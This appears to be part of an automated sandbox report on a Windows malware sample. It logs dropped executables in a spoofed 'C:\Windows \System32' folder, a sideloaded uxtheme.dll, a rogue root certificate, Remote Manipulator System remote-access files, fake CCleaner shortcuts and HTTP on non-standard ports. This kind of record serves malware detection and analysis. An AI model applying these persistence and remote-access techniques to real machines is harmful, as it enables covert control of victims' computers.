Source: 2.2.1wOdXavtlE.exe.740000.1.unpack, gqb4IDQUo2N4kw8qSI/I5CV7Kw49bI1cx8dAq.cs	High entropy of concatenated method names: 'Qw3MjvgS6T', 'Qw3MjvgS6T', 'hBproHeDt', 'sCP3EnieV', 'zhoo3VDaE', 'HtcTkoEb9', 'bcXDvv3hr', 'MgChGfa6e', '.ctor', 'drlKDnZ62jvBGdBx9Ui'
Source: 2.2.1wOdXavtlE.exe.740000.1.unpack, giVtGRJMm6swpwIJSv/gmUBYOAnq1OMDFkDni.cs	High entropy of concatenated method names: 'Ewk4HQXXhlXik', '.ctor', '.cctor', 'z9GXFfoP424yZCTcoaB', 'eLrvVLoypcxDlc9rhRU', 'uEP3RsoYdKMinVrgyeW', 'ScjivhoVG9pWpYXTcR9', 'IlE02sosnGabTVYv4qi', 'VkFWTioDGprN7wlEBSh', 'HmuIUlo5i2wA1tdcKZu'
Source: 2.2.1wOdXavtlE.exe.740000.1.unpack, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs	High entropy of concatenated method names: '.cctor', 'BoH4HQX9sxd3j', 'jm6fK5wNQi', 'sXKfRjaji2', 'sL2f8Mdjin', 'jhBfdTxy1K', 'xTafCKsDtd', 'Vl6fv4Djmx', 'NXMfI74sLu', 'aZEfxi5U0D'

Persistence and Installation Behavior:

Drops executables to the windows directory (C:\Windows) and starts them

Show sources

Source: C:\Windows\System32\cmd.exe

Executable created and started: C:\Windows \System32\PasswordOnWakeSettingFlyout.exe

Installs new ROOT certificates

Show sources

Source: C:\ProgramData\Immunity\CertMgry\CertMgr.Exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\5E2169F36E05D5652FF097A43315EECA06FC5927 Blob

Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	File created: C:\Users\user\AppData\Local\Temp\is-QEDPC.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\servs.exe	File created: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Jump to dropped file
Source: C:\Windows\System32\cmd.exe	File created: C:\Windows \System32\uxtheme.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	File created: C:\Users\user\AppData\Local\Temp\is-97L06.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	File created: C:\Users\user\AppData\Local\Temp\sssevs.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	File created: C:\ProgramData\is-R3F67.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	File created: C:\ProgramData\is-PFD3D.tmp	Jump to dropped file
Source: C:\Windows\System32\cmd.exe	File created: C:\Windows \System32\PasswordOnWakeSettingFlyout.exe	Jump to dropped file
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	File created: C:\Users\user\AppData\Local\Temp\ssevs.exe	Jump to dropped file
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	File created: C:\Users\user\AppData\Local\Temp\servs.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	File created: C:\ProgramData\Immunity\is-1J28N.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	File created: C:\ProgramData\Immunity\CertMgry\is-OTUTI.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	File created: C:\ProgramData\Immunity\is-2SOD7.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	File created: C:\ProgramData\Immunity\is-4BBH3.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	File created: C:\ProgramData\Immunity\is-02I40.tmp	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	File created: C:\ProgramData\is-R3F67.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	File created: C:\ProgramData\is-PFD3D.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	File created: C:\ProgramData\Immunity\is-1J28N.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	File created: C:\ProgramData\Immunity\CertMgry\is-OTUTI.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	File created: C:\ProgramData\Immunity\is-2SOD7.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	File created: C:\ProgramData\Immunity\is-4BBH3.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	File created: C:\ProgramData\Immunity\is-02I40.tmp	Jump to dropped file

Source: C:\Windows\System32\cmd.exe	File created: C:\Windows \System32\uxtheme.dll			Jump to dropped file
Source: C:\Windows\System32\cmd.exe	File created: C:\Windows \System32\PasswordOnWakeSettingFlyout.exe			Jump to dropped file

Source: C:\ProgramData\Immunity\rutserv.exe

File created: C:\ProgramData\Remote Manipulator System\install.log

Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\CCleaner
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\CCleaner\CCleaner.lnk
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner\CCleaner.lnk

Hooking and other Techniques for Hiding and Protection:

Uses known network protocols on non-standard ports

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 38214
Source: unknown	Network traffic detected: HTTP traffic on port 38214 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 38214 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 32972
Source: unknown	Network traffic detected: HTTP traffic on port 32972 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 32972 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 38214
Source: unknown	Network traffic detected: HTTP traffic on port 38214 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 38214 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 38214
Source: unknown	Network traffic detected: HTTP traffic on port 38214 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 38214 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 32972
Source: unknown	Network traffic detected: HTTP traffic on port 32972 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 32972 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 32972
Source: unknown	Network traffic detected: HTTP traffic on port 32972 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 32972 -> 49763

Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Code function: 19_2_005A55A4 IsIconic,GetWindowLongW,GetWindowLongW,GetActiveWindow,MessageBoxW,SetActiveWindow,
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Code function: 19_2_0062F930 IsIconic,GetWindowLongW,GetWindowLongW,GetActiveWindow,SetActiveWindow,

Source: C:\Users\user\Desktop\1wOdXavtlE.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Windows\regedit.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SYSTEM\RMS Host Installer Security

Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\pass.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
